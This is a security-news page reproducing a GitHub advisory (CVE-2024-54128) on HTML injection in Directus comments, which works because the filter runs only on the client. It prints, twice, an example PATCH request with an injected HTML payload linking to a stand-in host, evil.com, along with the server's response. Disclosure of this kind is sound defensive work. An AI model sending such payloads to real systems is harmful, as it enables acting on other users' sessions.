Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-r6wx-627v-gh2f: Directus has an HTML Injection in Comment

Summary

The Comment feature has implemented a filter to prevent users from adding restricted characters, such as HTML tags. However, this filter operates on the client-side, which can be bypassed, making the application vulnerable to HTML Injection.

Details

The Comment feature implements a character filter on the client-side, this can be bypassed by directly sending a request to the endpoint.

Example Request:

PATCH /activity/comment/3 HTTP/2
Host: directus.local

{
  "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>"
}

Example Response:

{
  "data": {
    "id": 3,
    "action": "comment",
    "user": "288fdccc-399a-40a1-ac63-811bf62e6a18",
    "timestamp": "2023-09-06T02:23:40.740Z",
    "ip": "10.42.0.1",
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
    "collection": "directus_files",
    "item": "7247dda1-c386-4e7a-8121-7e9c1a42c15a",
    "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>",
    "origin": "https://directus.local",
    "revisions": []
  }
}

Example Result:

Screenshot 2023-09-06 094536

Impact

With the introduction of session cookies this issue has become exploitable as a malicious script is now able to do authenticated actions on the current users behalf.

ghsa
#web#windows#apple#js#git#auth#chrome#webkit

Summary

The Comment feature has implemented a filter to prevent users from adding restricted characters, such as HTML tags. However, this filter operates on the client-side, which can be bypassed, making the application vulnerable to HTML Injection.

Details

The Comment feature implements a character filter on the client-side, this can be bypassed by directly sending a request to the endpoint.

Example Request:

PATCH /activity/comment/3 HTTP/2
Host: directus.local

{
  "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>"
}

Example Response:

{ "data": { "id": 3, "action": "comment", "user": "288fdccc-399a-40a1-ac63-811bf62e6a18", "timestamp": "2023-09-06T02:23:40.740Z", "ip": "10.42.0.1", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "collection": "directus_files", "item": "7247dda1-c386-4e7a-8121-7e9c1a42c15a", "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>", "origin": "https://directus.local", "revisions": [] } }

Example Result:

Impact

With the introduction of session cookies this issue has become exploitable as a malicious script is now able to do authenticated actions on the current users behalf.

References

  • GHSA-r6wx-627v-gh2f
  • https://nvd.nist.gov/vuln/detail/CVE-2024-54128
  • directus/directus@4487fb1
  • directus/directus@c89dbb2

ghsa: Latest News

GHSA-cmwp-442x-3rcv: Piranha CMS Cross-site Scripting vulnerability